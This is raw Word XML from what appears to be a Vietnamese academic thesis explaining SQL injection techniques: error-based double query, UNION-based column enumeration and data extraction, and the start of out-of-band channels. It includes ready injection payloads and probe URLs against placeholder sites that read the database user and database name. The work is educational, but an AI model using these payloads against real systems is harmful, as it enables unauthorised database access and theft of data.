                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="213042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4" w:name="_Toc458436417"/>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w:instrText>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:instrText xml:space="preserve"> \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5</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Lấy thông tin về tên CSDL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27798620" wp14:editId="7C1B35CA">
            <wp:extent cx="5972175" cy="202628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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="202628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5" w:name="_Toc458436418"/>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6</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Lấy thông tin về tên bảng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đối với MySQL, có một kỹ thuật được phát triển dựa trên dạng Error base đó là Double Query. Mã tấn công có dạng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www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>&lt;Your Query here to return single row&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t>),0x3a,floor(rand (0) *2))y from information_schema.tables group by y) x)-- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công khai thác điểm yếu trong việc không thể group by trên một cột mà các dữ liệu bị trùng (duplicate value). Bằng việc tạo ra một cột gồm các giá trị trùng 1,2 rồi group by, buộc MySQL đưa ra thông báo lỗi: Duplicate entry '</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>&lt;Your Output here&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:1' for key 'group_key'. Trong đó &lt;Your Output here&gt; là kết quả của câu truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ngày nay, dạng tấn công sử dụng thông báo lỗi rất hiếm gặp. Bởi vì điều kiện để có thể in ra thông báo lỗi này đòi hỏi hệ thống phải bật cấu hình cho phép hiển thị lỗi, thông thường là trong chế độ debug. Trong khi các ứng dụng thực tế, thông thường khi đưa vào khai thác đều tắt chế độ này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc459374317"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công sử dụng mệnh đề UNION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một trong những câu lệnh được các quản trị CSDL –D</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BA ưu thích sử dụng là UNION. Mệnh đề này cho phép ghép nối hai, hoặc nhiều mệnh đề SELECT lại. Cú pháp cơ bản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column-1,column-2,…,column-N FROM table-1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>UNION</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>SELECT column-1,column-2,…,column-N FROM table-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Câu lệnh này sau khi thực hiện sẽ trả về một bảng các kết quả của mệnh đề SELECT. Mặc định sẽ chỉ trả về các giá trị duy nhất, nếu muốn lấy các kết quả trùng, cần sửa lại câu lệnh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column-1,column-2,…,column-N FROM table-1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>UNION ALL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>SELECT column-1,column-2,…,column-N FROM table-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Điều này cho phép </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> lợi dụng trong tấn công SQL injection. Nếu ứng dụng trả về các kết quả trong câu lệnh truy vấn đầu tiên, thì bằng cách inject thêm mệnh đề UNION và mệnh đề SELECT phía sau, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể đọc được tùy ý các bảng khác (nếu tài khoản được cấu hình trên DBMS được phép truy cập). Tuy nhiên, việc sử dụng mệnh đề UNION này cũng phải tuân theo một số rule bắt buộc sau. Các mệnh đề UNION phải thỏa mãn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hai câu truy vấn (SELECT) phải trả về số cột bằng nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dữ liệu trong từng cột phải cùng loại, hoặc ít nhất tương thích với nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu các yêu cầu này không được thỏa mãn, đương nhiên câu lệnh sẽ không thể thực hiện được. Sẽ có thông báo lỗi được đưa ra, và đương nhiên nó phụ thuộc vào loại DBMS mà ứng dụng sử dụng. Tuy nhiên </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>luận văn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ không đi sâu vào vấn đề này. Câu hỏi đặt ra cho kẻ tấn công, người mà không biết được chính xác số lượng cột trong câu SELECT đầu tiên (vì câu lệnh này nằm trong mã nguồn), và định dạng dữ liệu từng cột, làm thế nào để xác định được 2 vấn đề này. Có hai phương pháp chính được sử dụng. Một là tăng dần số lượng cột cho đến khi câu truy vấn thực hiện không lỗi (trả về kết quả). Trên hầu hết các DBMS (từ Oracle 8i trở về trước) có thể sử dụng giá trị NULL cho mỗi cột, và đương nhiên NULL có thể chuyển sang bất kỳ dữ liệu nào. Điều này cho phép thỏa mãn cả điều kiện trên. Để ví dụ, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể thực hiện như sau: Liên tục gọi các URL cho đến khi kết quả hợp lệ được trả về.</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t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:lastRenderedPageBreak/>
              <w:t>w.victim.com/products.asp?id=12+union+select+null--</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+null,null--</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+null,null,null--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lưu ý rằng trong Oracle yêu cầu mỗi câu lệnh sử dụng SELECT phải chứa một FORM cụ thể, nên có thể thay đổi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http://www.victim.com/products.asp?id=12+union+select+null+from+dual--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dual là một bảng được truy cập từ mọi người dùng, và có thể được sử dụng khi không cần quan tâm đến một bảng cụ thể nào cả. Một cách khác để xác định số lượng cột là sử dụng mệnh đề ORDER BY. Mệnh đề này có thể chấp nhận tham số là một tên cột, hoặc một số thứ tự của cột trong bảng. Do đó có thể sử dụng để xác định số lượng cột bằng cách tăng cố cột trong ORDER BY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http://www.victim.com/products.asp?id=12+order+by+1</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+order+by+2</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+order+by+3 etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu như nhận được thông báo lỗi đầu tiên khi ORDER BY 6, có nghĩa là có 5 cột. Sau khi xác định được số cột thì vấn đề tiếp theo là xác định từng kiểu dữ liệu của cột. Giả sử là kiểu dữ liệu cần lấy về dạng strings, thì cần phải tìm ít nhất một cột có dạng dữ liệu này. Nếu như sử dụng kiểu NULL, đơn giản là chỉ cần thay thế một cột tại một lần. Ví dụ thấy rằng truy vấn có 4 cột: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http://www.victim.com/products.asp?id=12+union+select+‘test’,NULL,NULL,NULL</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+NULL,‘test’,NULL,NULL</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+NULL,NULL,‘test’,NULL</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:br/>
              <w:t>http://www.victim.com/products.asp?id=12+union+select+NULL,NULL,NULL,‘test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu không có thông báo lỗi nào trả về, </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> biết rằng giá trị test sẽ được trả về trong một cột nào đó. Ví dụ đó là cột thứ hai, khi đó nếu như muốn lấy tên một người sử dụng hiện tại (tài khoản DBMS) thì thực hiện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http://www.victim.com/products.asp?id=12+union+select+NULL,system_user,NULL,NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="0034667B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AEB811E" wp14:editId="77C523C0">
            <wp:extent cx="4890770" cy="25717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4"/>
                    <a:srcRect r="-708" b="29548"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4890770" cy="257175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7" w:name="_Toc458436419"/>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7</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trả về của mệnh đề UNION.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Như vậy bảng mới đã chứa thông tin mà </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kẻ tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cần lấy: thông tin tài khoản hiện tại. Từ đây dễ dàng thực hiện các bước tấn công khác để lấy nhiều thông</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> tin khác. Tuy nhiên, cần chú ý rằng có một số kỹ thuật nhỏ khác trong việc sử dụng UNION. Đầu tiên là trong ví dụ trước, có bốn cột, do đó, có thể thay thể để lấy dữ liệu từ cả thêm một cột khác:</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http://www.victim.com/products.asp?id=12+union+select+NULL,system_user,db_name(),NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tuy nhiên không phải lúc nào cũng có thể sử dụng được cột khác, có khi chỉ là một cột, trong khi lại có nhiều dữ liệu cần phải trích xuất. Để có thể nhanh hơn có thể sử dụng toán tử ghép nối (concatenation) để nối các mảnh dữ liệu lại. Ví dụ đối với MSSQL Server:</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NULL, system_user + ‘ | ’ + db_name(), NULL, NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Câu lệnh sẽ ghép nối kết quả của system_user và db_name(), với ký tự ‘|’ để phân biệt. Như vậy </w:t>
      </w:r>
      <w:r w:rsidR="00B649B0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã thêm một trường dữ liệu vào chung một cột, chuyển thành dạng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http://www.victim.com/products.asp?id=12+union+select+NULL,system_user%2B‘+|+’%2Bdb_name(),NULL,NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60F9845E" wp14:editId="5F5801A8">
            <wp:extent cx="5972175" cy="31864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5"/>
                    <a:srcRect t="28757"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="318643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28" w:name="_Toc458436420"/>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8</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ghép nối dữ liệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Bằng việc sử dụng các câu lệnh khác, </w:t>
      </w:r>
      <w:r w:rsidR="006E25A7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể khai thác, đọc dữ liệu từ một bảng bất kỳ. Tuy nhiên, trong một số trường hợp, kết quả truy vấn không trả về trong dạng HTML trong trì</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nh duyệt người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc459374318"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tấn công Out of Band Channel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong nhiều trường hợp của SQL injection, ứng dụng không trả lại kết quả của bất kỳ câu truy vấn trong trình duyệt của người dùng, và cũng không trả lại bất kỳ thông báo lỗi tạo ra bởi các CSDL. Trong tình huống này, ngay cả khi lỗ hổng SQL injection tồn tại cũng không chắc chắn có thể trích xuất được dữ liệu, hoặc thực hiện một hành động khác. Có thể sử dụng một số kỹ thuật để nhận về kết quả của câu truy vấn, để xác định việc thực hiện có thành công hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Phân tích ví dụ chức năng đăng nhập, có thể inject vào một vị trí bất kỳ trong câu lệnh kiểm tra. Tuy nhiên lại không thể nhận được kết quả của câu truy vấn đó.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‘marcus’ and password = ‘secret’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngoài việc thay đổi logic của ứng dụng để vượt qua chức năng đăng nhập ở trên, </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể chèn một câu truy vấn con (sub-query) riêng biệt để tạo ra dữ liệu mà có thể kiểm soát. Ví dụ nếu trường username truyền vào: foo’ || (SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE username = ‘DBSNMP’) = ‘DBSNMP’) -- thì câu truy vấn sẽ trở thành:</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‘foo’ || (SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE username = ‘DBSNMP’) = ‘DBSNMP’)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Câu lệnh truy vấn sẽ thực thi câu truy vấn bên trong. Tất nhiên việc đăng nhập sẽ thất bại, tuy nhiên câu lệnh con bên trong sẽ được thực thi. Việc tiếp theo cần phải lấy được kết quả của câu truy vấn con này. Khi đó, cần một kênh truyền dạng khác để lấy được kết quả. Thông thường sẽ sử dụng các chức năng mà DBMS hỗ trợ để tạo ra một kết nối ngược lại máy tính của người dùng – cũng là kẻ tấn công. Qua đó, kết quả được truyền đến máy tính của kẻ tấn công. Việc tạo ra các kết nối này phục thuộc vào loại DBMS mà ứng dụng sử dụng, các phương pháp này có thể khác nhau, hoặc đòi hỏi đặc quyền cụ thể. Một số kỹ thuật phổ biến như:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>MS-SQL</w:t>
      </w:r>
